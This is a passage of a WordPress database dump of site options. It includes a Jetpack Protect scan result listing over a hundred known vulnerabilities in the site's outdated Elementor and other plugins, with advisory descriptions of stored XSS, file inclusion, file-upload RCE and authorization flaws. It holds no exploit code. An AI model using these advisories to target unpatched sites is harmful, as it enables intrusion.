"advanced\";a:1:{s:18:\"section_custom_css\";a:1:{s:10:\"custom_css\";i:1;}}}}s:9:\"shortcode\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}s:7:\"wp-post\";a:8:{s:11:\"text-editor\";a:2:{s:5:\"count\";i:28;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:28;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:27;s:21:\"typography_typography\";i:27;s:20:\"typography_font_size\";i:27;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:95;s:8:\"controls\";a:0:{}}s:7:\"section\";a:2:{s:5:\"count\";i:95;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:95;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:56;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:56;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:56;s:21:\"typography_typography\";i:55;s:22:\"typography_font_family\";i:55;s:20:\"typography_font_size\";i:55;s:22:\"typography_font_weight\";i:55;}}}}s:9:\"shortcode\";a:2:{s:5:\"count\";i:28;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:28;}}}}s:5:\"image\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:2;s:10:\"image_size\";i:2;s:7:\"caption\";i:2;s:4:\"link\";i:2;}}}}s:7:\"divider\";a:2:{s:5:\"count\";i:7;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:7;s:3:\"gap\";i:7;}}}}s:6:\"spacer\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:0:{}}}s:7:\"section\";a:4:{s:7:\"heading\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:0:{}}s:7:\"section\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}}}}}s:4:\"page\";a:3:{s:11:\"text-editor\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:0:{}}s:7:\"section\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:2;}}}}}s:6:\"footer\";a:8:{s:11:\"text-editor\";a:2:{s:5:\"count\";i:9;s:8:\"controls\";a:4:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:9;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:8:{s:10:\"text_color\";i:9;s:21:\"typography_typography\";i:9;s:22:\"typography_font_family\";i:9;s:22:\"typography_font_weight\";i:9;s:25:\"typography_text_transform\";i:4;s:22:\"typography_line_height\";i:1;s:20:\"typography_font_size\";i:5;s:5:\"align\";i:3;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}}}s:6:\"button\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:6:{s:4:\"text\";i:1;s:4:\"size\";i:1;s:13:\"selected_icon\";i:1;s:10:\"icon_align\";i:1;s:11:\"icon_indent\";i:1;s:4:\"link\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:10:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:16:\"background_color\";i:1;s:11:\"hover_color\";i:1;s:29:\"button_background_hover_color\";i:1;s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:13:\"border_radius\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:14;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:14;s:16:\"content_position\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:3;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}s:8:\"nav-menu\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:6:{s:4:\"menu\";i:1;s:6:\"layout\";i:1;s:11:\"align_items\";i:1;s:7:\"pointer\";i:1;s:12:\"submenu_icon\";i:1;s:8:\"dropdown\";i:1;}}s:5:\"style\";a:1:{s:23:\"section_style_main-menu\";a:7:{s:26:\"menu_typography_typography\";i:1;s:27:\"menu_typography_font_family\";i:1;s:27:\"menu_typography_font_weight\";i:1;s:30:\"menu_typography_text_transform\";i:1;s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:18:\"menu_space_between\";i:1;}}s:8:\"advanced\";a:2:{s:36:\"jet_family_widget_orientaion_section\";a:1:{s:37:\"jet_family_widget_is_order_orientaion\";i:1;}s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}}}s:9:\"icon-list\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_icon_style\";a:1:{s:10:\"icon_color\";i:1;}s:18:\"section_text_style\";a:5:{s:10:\"text_color\";i:1;s:26:\"icon_typography_typography\";i:1;s:27:\"icon_typography_font_family\";i:1;s:25:\"icon_typography_font_size\";i:1;s:27:\"icon_typography_font_weight\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:5;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}s:14:\"section_layout\";a:3:{s:16:\"content_position\";i:2;s:3:\"gap\";i:2;s:6:\"layout\";i:2;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:2:{s:6:\"margin\";i:2;s:7:\"padding\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;}}}}s:5:\"image\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:1;s:5:\"align\";i:1;s:7:\"link_to\";i:1;s:4:\"link\";i:1;}}}}s:12:\"social-icons\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:19:\"section_social_icon\";a:3:{s:16:\"social_icon_list\";i:1;s:5:\"shape\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:20:\"section_social_style\";a:4:{s:10:\"icon_color\";i:1;s:18:\"icon_primary_color\";i:1;s:9:\"icon_size\";i:1;s:12:\"icon_spacing\";i:1;}}}}}}','no'),(2188928,'elementor_1_elementor_updater_batch_7fadceb43d6dad6f821063f84d3d','a:1:{i:0;a:1:{s:8:\"callback\";a:2:{i:0;s:31:\"Elementor\\Core\\Upgrade\\Upgrades\";i:1;s:16:\"_on_each_version\";}}}','no'),(2189091,'jet_smart_filters_version','3.1.2','no'),(2189125,'user_count','5','no'),(2189484,'elementor_font_awesome_pro_kit_id','','yes'),(2189485,'elementor_pro_stripe_test_secret_key','','yes'),(2189486,'elementor_validate_stripe_api_test_secret_key_button','','yes'),(2189487,'elementor_pro_stripe_live_secret_key','','yes'),(2189488,'elementor_validate_stripe_api_live_secret_key_button','','yes'),(2189489,'elementor_stripe_legal_disclaimer','','yes'),(2189490,'elementor_experiment-container','default','yes'),(2189491,'elementor_experiment-page-transitions','default','yes'),(2189492,'elementor_experiment-e_hidden_wordpress_widgets','default','yes'),(2189493,'elementor_experiment-theme_builder_v2','default','yes'),(2189494,'elementor_experiment-favorite-widgets','default','yes'),(2189495,'elementor_experiment-notes','default','yes'),(2189496,'elementor_experiment-e_scroll_snap','default','yes'),(2189620,'jetpack_protect_status','s:70071:\"O:8:\"stdClass\":8:{s:12:\"last_checked\";s:19:\"2026-06-18 16:28:29\";s:19:\"num_vulnerabilities\";i:103;s:27:\"num_plugins_vulnerabilities\";i:103;s:26:\"num_themes_vulnerabilities\";i:0;s:6:\"status\";s:11:\"in_progress\";s:4:\"core\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"6.9.4\";s:15:\"vulnerabilities\";a:0:{}}s:6:\"themes\";O:8:\"stdClass\":6:{s:10:\"kava-child\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"1.0.1\";s:15:\"vulnerabilities\";a:0:{}}s:4:\"kava\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"2.1.2\";s:15:\"vulnerabilities\";a:0:{}}s:16:\"twentytwentyfive\";O:8:\"stdClass\":2:{s:7:\"version\";s:3:\"1.4\";s:15:\"vulnerabilities\";a:0:{}}s:16:\"twentytwentyfour\";O:8:\"stdClass\":2:{s:7:\"version\";s:3:\"1.0\";s:15:\"vulnerabilities\";a:0:{}}s:17:\"twentytwentythree\";O:8:\"stdClass\":2:{s:7:\"version\";s:3:\"1.3\";s:15:\"vulnerabilities\";a:0:{}}s:15:\"twentytwentytwo\";O:8:\"stdClass\":2:{s:7:\"version\";s:3:\"1.2\";s:15:\"vulnerabilities\";a:0:{}}}s:7:\"plugins\";O:8:\"stdClass\":28:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:3:\"5.7\";s:15:\"vulnerabilities\";a:0:{}}s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"7.102\";s:15:\"vulnerabilities\";a:0:{}}s:91:\"all-in-one-wp-migration-unlimited-extension/all-in-one-wp-migration-unlimited-extension.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:4:\"2.82\";s:15:\"vulnerabilities\";a:1:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"4d7317ec-bf98-4ac1-b677-d2936c61d938\";s:5:\"title\";s:165:\"All-in-One WP Migration Unlimited Extension < 2.84 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Backup Schedule Creation and Backup File Download\";s:8:\"fixed_in\";s:4:\"2.84\";s:11:\"description\";s:688:\"The All-in-One WP Migration Unlimited Extension plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.83. This is due to the \'Ai1wmve_Schedules_Controller::save\' handler for \'admin_post_ai1wm_schedule_event_save\' not verifying user capabilities before saving schedule data. This makes it possible for authenticated attackers, with subscriber-level access and above, to create scheduled export jobs and send backup notifications to attacker-controlled email addresses. Because such notifications include the random backup filename, full site backups can subsequently be downloaded from the target site, resulting in sensitive information exposure.\";s:13:\"introduced_in\";N;}}}s:25:\"bit-social/bit-social.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:6:\"1.13.3\";s:15:\"vulnerabilities\";a:0:{}}s:33:\"bit-social-pro/bit-social-pro.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:7:\"1.13.10\";s:15:\"vulnerabilities\";a:0:{}}s:39:\"button-contact-vr/button-contact-vr.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"5.0.4\";s:15:\"vulnerabilities\";a:0:{}}s:57:\"category-subcategory-list-widget/category-list-widget.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:3:\"6.0\";s:15:\"vulnerabilities\";a:0:{}}s:23:\"site-mode/site-mode.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"1.1.1\";s:15:\"vulnerabilities\";a:1:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"ec96eaa7-0d3d-48c6-a4da-5a954ee367fc\";s:5:\"title\";s:77:\"Coming Soon, Maintenance Mode <= 1.1.1 - Unauthenticated Local File Inclusion\";s:8:\"fixed_in\";N;s:11:\"description\";s:472:\"The Coming Soon, Maintenance Mode plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.\";s:13:\"introduced_in\";N;}}}s:49:\"content-aware-sidebars/content-aware-sidebars.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:6:\"3.19.3\";s:15:\"vulnerabilities\";a:0:{}}s:58:\"easy-maintenance-mode-by-wpkoder/easy-maintenance-mode.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:3:\"1.7\";s:15:\"vulnerabilities\";a:0:{}}s:35:\"ele-custom-skin/ele-custom-skin.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"3.1.7\";s:15:\"vulnerabilities\";a:0:{}}s:43:\"ele-custom-skin-pro/ele-custom-skin-pro.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"3.2.4\";s:15:\"vulnerabilities\";a:0:{}}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"3.7.8\";s:15:\"vulnerabilities\";a:28:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"a875836d-77f4-4306-b275-2b60efff1493\";s:5:\"title\";s:48:\"Elementor Website Builder < 3.12.2 - Admin+ SQLi\";s:8:\"fixed_in\";s:6:\"3.12.2\";s:11:\"description\";s:207:\"The plugin does not properly sanitize and escape the Replace URL parameter in the Tools module before using it in a SQL statement, leading to a SQL injection exploitable by users with the Administrator role.\";s:13:\"introduced_in\";N;}i:1;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"0b68091c-6a05-4f81-a718-6ec139df2e96\";s:5:\"title\";s:58:\"Elementor Website Builder < 3.13.2 - Missing Authorization\";s:8:\"fixed_in\";s:6:\"3.13.2\";s:11:\"description\";s:233:\"The plugin does not check user capabilities on several functions, allowing authenticated attackers with a low amount of privilege (such as Subscribers) to perform actions that should only be available to users with higher privileges.\";s:13:\"introduced_in\";N;}i:2;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"62b53acf-6551-4ea7-8727-039a3c9ba7ce\";s:5:\"title\";s:114:\"Elementor Website Builder < 3.16.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via get_inline_svg()\";s:8:\"fixed_in\";s:6:\"3.16.5\";s:11:\"description\";s:425:\"The Elementor Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the get_inline_svg() function in versions up to, and including, 3.16.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:3;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"e60f0f7e-4c3b-4107-803a-8e03526859ed\";s:5:\"title\";s:87:\"Elementor Website Builder < 3.16.5 - Missing Authorization to Arbitrary Attachment Read\";s:8:\"fixed_in\";s:6:\"3.16.5\";s:11:\"description\";s:335:\"The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_inline_svg function in all versions up to, and including, 3.16.4. This makes it possible for authenticated attackers, with contributor-level access and above, to read arbitrary attachment files.\";s:13:\"introduced_in\";N;}i:4;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"a6b3b14c-f06b-4506-9b88-854f155ebca9\";s:5:\"title\";s:82:\"Elementor < 3.18.2 - Contributor+ Arbitrary File Upload to RCE via Template Import\";s:8:\"fixed_in\";s:6:\"3.18.2\";s:11:\"description\";s:227:\"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\";s:13:\"introduced_in\";N;}i:5;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"4d7dfcc6-8c32-4e0d-b3bb-7e2685916e2b\";s:5:\"title\";s:97:\"Elementor < 3.19.1 - Authenticated(Contributor+) Arbitrary File Deletion and PHAR Deserialization\";s:8:\"fixed_in\";s:6:\"3.19.1\";s:11:\"description\";s:514:\"The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to arbitrary file deletions and PHAR deserialization in version up to, and including 3.19.0. This is due to the plugin not providing sufficient path validation on the \'tmp_name\' parameter . This makes it possible for authenticated attackers, with contributor-level access and above, to delete arbitrary files and inject PHP Objects through the use of a phar wrapper, both of which can lead to remote code execution.\";s:13:\"introduced_in\";N;}i:6;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"57af46d9-9a26-4085-9829-e0add7893332\";s:5:\"title\";s:145:\"Elementor Website Builder – More than Just a Page Builder < 3.19.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via get_image_alt\";s:8:\"fixed_in\";s:6:\"3.19.0\";s:11:\"description\";s:531:\"The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $instance[alt] parameter in the get_image_alt function in all versions up to, and including, 3.18.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\";s:13:\"introduced_in\";N;}i:7;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"22e8d017-79f5-40c8-8a2c-e0ee42ba80c8\";s:5:\"title\";s:64:\"Elementor Website Builder < 3.20.3 - Contributor+ DOM Stored XSS\";s:8:\"fixed_in\";s:6:\"3.20.3\";s:11:\"description\";s:329:\"The plugin is vulnerable to Stored Cross-Site Scripting via the plugin\'s Path Widget due to insufficient output escaping on user supplied attributes, allowingnauthenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:8;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"8b8f30d6-bd11-4155-bfd2-3ac15248382b\";s:5:\"title\";s:64:\"Elementor Website Builder < 3.21.6 - Contributor+ DOM Stored XSS\";s:8:\"fixed_in\";s:6:\"3.21.6\";s:11:\"description\";s:365:\"The plugin is vulnerable to DOM-Based Stored Cross-Site Scripting via the ‘hover_animation’ parameter due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:9;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"e6d56be1-9a2a-426f-88ca-1ffa773622c1\";s:5:\"title\";s:72:\"Elementor Website Builder < 3.22.2 - Contributor+ Arbitrary SVG Download\";s:8:\"fixed_in\";s:6:\"3.22.2\";s:11:\"description\";s:369:\"The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to arbitrary SVG file download in all versions up to, and including, 3.22.1. This is due to the plugin not properly restricting access to files. This makes it possible for authenticated attackers, with contributor-level access and above, to download arbitrary SVG files.\";s:13:\"introduced_in\";N;}i:10;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"5200943b-5e07-4342-a090-f78435e30d30\";s:5:\"title\";s:168:\"Elementor Website Builder – More than Just a Page Builder < 3.24.0 - Authenticated (Contributor+) Stored Cross-Site Scripting in the URL Parameter in Multiple Widgets\";s:8:\"fixed_in\";s:6:\"3.24.0\";s:11:\"description\";s:502:\"The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url parameter of multiple widgets in all versions up to, and including, 3.23.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in Elementor Editor pages. This was partially patched in version 3.23.2.\";s:13:\"introduced_in\";N;}i:11;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"dce5ad0c-3ce9-498f-b0f7-8dfd6ee82e40\";s:5:\"title\";s:72:\"Elementor < 3.24.6 - Contributor+ Information Exposure via get_image_alt\";s:8:\"fixed_in\";s:6:\"3.24.6\";s:11:\"description\";s:260:\"The plugin is vulnerable to Basic Information Exposure via the get_image_alt function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract either excerpt data or titles of private or password-protected posts.\";s:13:\"introduced_in\";N;}i:12;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"78f0847b-3f59-43cf-87db-2cadda862aa3\";s:5:\"title\";s:60:\"Elementor Website Builder < 3.25.8 - Contributor+ Stored XSS\";s:8:\"fixed_in\";s:6:\"3.25.8\";s:11:\"description\";s:357:\"The plugin is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter of the Icon widget due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:13;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"2e05843d-1797-4da9-99ec-06376484fb32\";s:5:\"title\";s:85:\"Elementor Website Builder < 3.25.10 - Contributor+ Stored XSS via Typography Settings\";s:8:\"fixed_in\";s:7:\"3.25.10\";s:11:\"description\";s:375:\"The plugin is vulnerable to Stored Cross-Site Scripting via the plugin\'s Typography Settings due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:14;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"25374232-2f9c-453d-bc47-124f80e67a92\";s:5:\"title\";s:60:\"Elementor Website Builder < 3.27.5 - Contributor+ Stored XSS\";s:8:\"fixed_in\";s:6:\"3.27.5\";s:11:\"description\";s:352:\"The plugin is vulnerable to Stored Cross-Site Scripting via the border, margin and gap parameters due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:15;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"61e1476a-cb14-46f9-b68c-4fd5b5c39597\";s:5:\"title\";s:61:\"Elementor Website Builder < 3.25.11 - Contributor+ Stored XSS\";s:8:\"fixed_in\";s:7:\"3.25.11\";s:11:\"description\";s:310:\"The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:16;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"fc8e4264-fa78-44d2-8b6d-6c4305cd2280\";s:5:\"title\";s:60:\"Elementor Website Builder < 3.29.1 - Contributor+ Stored XSS\";s:8:\"fixed_in\";s:6:\"3.29.1\";s:11:\"description\";s:312:\"The plugins are vulnerable to Stored Cross-Site Scripting due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:17;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"34330a7b-d178-4998-9067-17ae2564cb9a\";s:5:\"title\";s:44:\"Elementor < 3.29.1 - Contributor+ Stored XSS\";s:8:\"fixed_in\";s:6:\"3.29.1\";s:11:\"description\";s:441:\"The plugin is vulnerable to Stored Cross-Site Scripting via the plugin\'s \'elementor-element\' shortcode due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts sites with \'Element Caching\' enabled.\";s:13:\"introduced_in\";N;}i:18;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"785a15fe-18ef-4ae2-9143-c625a7a16063\";s:5:\"title\";s:65:\"Elementor < 3.30.3 - Contributor+ Stored XSS via Text Path Widget\";s:8:\"fixed_in\";s:6:\"3.30.3\";s:11:\"description\";s:416:\"The plugin is vulnerable to Stored Cross-Site Scripting via the data-text DOM element attribute in Text Path widget due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This attack affects only Chrome/Edge browsers\";s:13:\"introduced_in\";N;}i:19;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"87fd0b78-c0e8-43a8-8b52-bd7a294a96e0\";s:5:\"title\";s:64:\"Elementor < 3.30.3 - Admin+ Arbitrary File Read via Image Import\";s:8:\"fixed_in\";s:6:\"3.30.3\";s:11:\"description\";s:335:\"The plugin is vulnerable to Arbitrary File Read via the Import_Images::import() function due to insufficient controls on the filename specified. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.\";s:13:\"introduced_in\";N;}i:20;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"ebb1b7b0-cb97-4430-ac6a-e27fe8714b0e\";s:5:\"title\";s:58:\"Elementor Website Builder < 3.33.1 - Missing Authorization\";s:8:\"fixed_in\";s:6:\"3.33.1\";s:11:\"description\";s:224:\"The plugin is vulnerable to unauthorized access due to a missing capability check on a function. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action.\";s:13:\"introduced_in\";N;}i:21;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"bfe75150-4ae3-44c1-b886-4ff90ca9f0f4\";s:5:\"title\";s:69:\"Elementor < 3.33.4  - Contributor+ Stored DOM-Based XSS via Text Path\";s:8:\"fixed_in\";s:6:\"3.33.4\";s:11:\"description\";s:387:\"The plugin is vulnerable to Stored Cross-Site Scripting via the plugin\'s Text Path widget  due to insufficient neutralization of user-supplied input used to build SVG markup inside the widget. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:22;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"44a36810-631b-47ca-82f7-e90a5bda1538\";s:5:\"title\";s:103:\"Elementor Website Builder < 3.35.8 - Contributor+ Sensitive Information Exposure via Elementor Template\";s:8:\"fixed_in\";s:6:\"3.35.8\";s:11:\"description\";s:498:\"The plugin is vulnerable to Incorrect Authorization to Sensitive Information Exposure due to a logic error in the is_allowed_to_read_template() function permission check that treats non-published templates as readable without verifying edit capabilities. This makes it possible for authenticated attackers, with contributor-level access and above, to read private or draft Elementor template content via the \'template_id\' supplied to the \'get_template_data\' action of the \'elementor_ajax\' endpoint.\";s:13:\"introduced_in\";N;}i:23;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"77ad91f1-81e5-45c7-86e9-8fb5d1abaf0b\";s:5:\"title\";s:73:\"Elementor Website Builder < 3.35.6 - Contributor+ Stored XSS via REST API\";s:8:\"fixed_in\";s:6:\"3.35.6\";s:11:\"description\";s:340:\"The plugin is vulnerable to Stored Cross-Site Scripting via several widget parameters due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:24;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"0a965d76-8557-4e1d-8ba2-65bcf22e6fff\";s:5:\"title\";s:58:\"Elementor Website Builder < 3.35.6 - Missing Authorization\";s:8:\"fixed_in\";s:6:\"3.35.6\";s:11:\"description\";s:219:\"The plugin is vulnerable to unauthorized access due to a missing capability check on a function. This makes it possible for authenticated attackers, with author-level access and above, to perform an unauthorized action.\";s:13:\"introduced_in\";N;}i:25;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"76dec1e6-2504-4405-ab7b-31650e23212f\";s:5:\"title\";s:60:\"Elementor Website Builder < 3.35.6 - Contributor+ Stored XSS\";s:8:\"fixed_in\";s:6:\"3.35.6\";s:11:\"description\";s:310:\"The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:26;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"608854ac-1257-49ea-bfce-08304a921ac8\";s:5:\"title\";s:72:\"Elementor Website Builder < 4.0.5 - Contributor+ Stored XSS via REST API\";s:8:\"fixed_in\";s:5:\"4.0.5\";s:11:\"description\";s:960:\"The plugin is vulnerable to Stored Cross-Site Scripting via the _elementor_data meta field due to insufficient input sanitization when processing form-encoded REST API 